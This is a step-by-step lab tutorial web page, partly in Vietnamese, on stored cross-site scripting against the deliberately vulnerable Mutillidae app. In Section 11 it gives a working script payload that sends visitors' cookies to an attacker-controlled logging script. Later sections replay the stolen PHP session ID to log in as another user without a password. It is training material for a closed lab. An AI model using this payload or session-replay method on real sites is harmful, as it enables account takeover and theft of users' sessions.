Home »
OWASP
» OWASP Top 10 Web Hacking Final Lab 15 - Man-in-the-Middle, Persistent Covert Cross Site Scripting Injection #2
OWASP Top 10 Web Hacking Final Lab 15 - Man-in-the-Middle, Persistent Covert Cross Site Scripting Injection #2
{ Man-in-the-Middle, Persistent Covert Cross Site Scripting Injection #2 }
Login to Win-XP hoặc Win7 (Victim Machine)
|
- Edit Virtual Machine Settings
- Instructions:
- Click on Damn Vulnerable WXP-SP2
- Edit Virtual Machine Settings
- Note(FYI):
- This third Virtual Machine does not have to be Windows XP. I just need to be another Virtual Machine to demonstrate how the cookie will be sent covertly with the victim knowing.
-
- Set Network Adapter
- Instructions:
- Click on Network Adapter
- Click on the radio button "Bridged: Connected directly to the physical network".
- Start Up Damn Vulnerable WXP-SP2.
- Instructions:
- Start Up your VMware Player
- Play virtual machine
- Logging into Damn Vulnerable WXP-SP2.
- Instructions:
- Username: administrator
- Password: <Provide the Password>
- Open a Command Prompt
- Instructions:
- Start --> All Programs --> Accessories --> Command Prompt
- Obtain the IP Address
- Instructions:
- In the Command Prompt type "ipconfig"
- Note(FYI):
- In my case, Damn Vulnerable WXP-SP2's IP Address 192.168.1.116.
- This is the IP Address of the Victim Machine.
- Record your IP Address.
| Section 8. Start Apache Webserver |
- Start Apache2 (On BackTrack5R1)
- Instructions:
- service apache2 start
- service apache2 status
- ps -eaf | grep apache2 | grep -v grep
- Note(FYI):
- Start up the apache2 webserver.
- Display the status of the apache2 webserver.
- See the processes of the apache2 webserver.
| Section 9. Verify Cookie Script Exists |
- Verify Cookie Script Exists (On BackTrack5R1)
- Instructions:
- ls -l /usr/lib/cgi-bin/logit.pl
- cat /dev/null > /var/www/logdir/log.txt
- ls -l /var/www/logdir/log.txt
- Note(FYI):
- List the logit.pl script. If this script is not present, then complete the pre-requisite lab.
- Clear the log.txt havest0r file.
- Notice the log.txt is now a Zero Byte File.
| Section 10. Open Mutillidae |
- Open Firefox (On BackTrack5R1)
- Instructions:
- Click on the Firefox Icon
- Notes (FYI):
- If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
- Open Mutillidae
- Notes (FYI):
- Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
- Instructions:
- Place the following URL in the Address Bar
- http://192.168.1.111/mutillidae/
- Reset Database
- Instructions:
- Click the Reset DB Link
- Notes (FYI):
- This link will remove the XSS Injection from the database.
- Proceed with Database Reset
- Instructions:
- Click the OK Button
| Section 11. Persistent Covert Cross Site Script(XSS) |
- Add to your blog
- Instructions:
- OWASP Top 10 --> A2 - Cross Site Scripting(XSS) --> Persistent(Second Order) --> Add to your blog
- Inspect Element
- Instructions:
- Right Click in the Comment Box
- Click Inspect Element
- Note(FYI):
- This is not a necessary step for the injection. The goal is to allow the injection attempt to remain on the same line instead of being word-wrapped.
- Change Text Area Column Length
- Instructions:
- Change 65 to 95
- Click Close Button (See Picture)
- Covert Cookie Harvest0r Cross Site Script (XSS) Injection
- Note(FYI):
- Replace 192.168.1.112 with your BackTrack IP Address obtained in (Section 6, Step 2).
- This JavaScript tells the web browser to send the cookies back to the CGI Cookie Script on the BackTrack Machine.
- Instructions:
- Place the below text in the comment box.
- <script> new Image().src="http://192.168.1.112/cgi-bin/logit.pl?"+document.cookie; </script>
- Click the Save Blog Entry
- View Cookie Harvest0r Cross Site Script (XSS) Results
- Note(FYI):
- Notice nothing is displayed under the comment cell.
- Or are your eyes deceiving you?
- View the Havest0r Log
- Instructions:
- cat /var/www/logdir/log.txt
- Notes (FYI):
- Although the Blog displayed nothing back to us, it was covertly recorded in our Havest0r log.
- How do you like them apples?
| Section 12. Login to Mutillidae |
- Start up Internet Explo[d]er (On Damn Vulnerable WXP-SP2)
- Instructions:
- Start --> All Programs --> Internet Explorer
- Open the Mutillidae Application
- Notes (FYI):
- Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
- Instructions:
- Place the following URL in the Address Bar
- http://192.168.1.111/mutillidae/
- Click Login/Register
- Login
- Instructions:
- Name: samurai
- Password: samurai
- Click the Login Button
- Notes(FYI):
- We are logging on to Mutillidae to simulate a user logging on to a real application and being granted a Session ID.
- View someone's blog
- Instructions:
- OWASP Top 10 --> A2 - Cross Site Scripting (XSS) --> Persistent (Second Order) --> View someones's blog
- Show All Blog Entries
- Instructions:
- Select Show All from the down drop menu
- View Blog Entries
- View Blog Entries
- Note(FYI):
- Notice nothing is displayed under the comment cell.
- Is this Deja Vu?
| Section 13. View Havest0r Log |
- View the Havest0r Log (On BackTrack5R1)
- Instructions:
- cat /var/www/logdir/log.txt
- Notes (FYI):
- Notice the cookie now shows the username samurai.
- Notice the cookie now shows the PHP Session ID, which is pretty much equivalent to a password.
| Section 14. Simulate Man-In-The-Middle Attack |
- On BackTrack, Open Firefox (On BackTrack5R1)
- Instructions:
- Click on the Firefox Icon
- Notes (FYI):
- If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
- Start Cookies Manager+
- Instructions:
- Tools --> Cookies Manager+
- Notes (FYI):
- Click here to install Cookie Manager+ you have not already done so.
- Add Cookie Entry
- Instructions:
- Click the Add Button
- Add PHPSESSID Cookie Entry
- Note(FYI):
- Replace jri8sj5cnl6ironsqtnbpo9e21 with your PHPSESSID found in crack_cookies.txt (See Below Picture).
- Replace 192.168.1.111 with Mutillidae's IP Address Host IP Address obtained from (Section 3, Step 3).
- Instructions:
- Name: PHPSESSID
- Content: jri8sj5cnl6ironsqtnbpo9e21
- Host: 192.168.1.111
- Path: /
- Click the Save Button.
- Add Cookie Entry
- Instructions:
- Click the Add Button
- Add showhints Cookie Entry
- Note(FYI):
- Replace 192.168.1.111 with Mutillidae's IP Address Host IP Address obtained from (Section 3, Step 3).
- Instructions:
- Name: showhints
- Content: 0
- Host: 192.168.1.111
- Path: /mutillidae/
- Click the Save Button
- Add Cookie Entry
- Instructions:
- Click the Add Button
- Add username Cookie Entry
- Note(FYI):
- Replace 192.168.1.111 with Mutillidae's IP Address Host IP Address obtained from (Section 3, Step 3).
- Instructions:
- Name: username
- Content: samurai
- Host: 192.168.1.111
- Path: /mutillidae/
- Click the Save Button
- Add Cookie Entry
- Instructions:
- Click the Add Button
- Add uid Cookie Entry
- Note(FYI):
- Replace 192.168.1.111 with Mutillidae's IP Address Host IP Address obtained from (Section 3, Step 3).
- Instructions:
- Name: uid
- Content: 6
- Host: 192.168.1.111
- Path: /mutillidae/
- Click the Save Button
- Click the Close Button
- Implement Man-in-the-Middle Attack
- Note(FYI):
- Replace 192.168.1.111 with Mutillidae's IP Address Host IP Address obtained from (Section 3, Step 3).
- Notice you will be automagically logged in without a password. For this reason, it is extremely important that session information is (1) not only encrypted, (2) but also users logout after they finish their session.
- Instructions:
- http://192.168.1.111/mutillidae/
- Notice that user samurai logged in without a password.
- On BackTrack, Start up a terminal window (On BackTrack5R1)
- Instructions:
- Click on the Terminal Window
- Proof of Lab Các bạn hãy quay lại toàn bộ tiến trình thực hành và text note có tên của mình
0 comments:
Post a Comment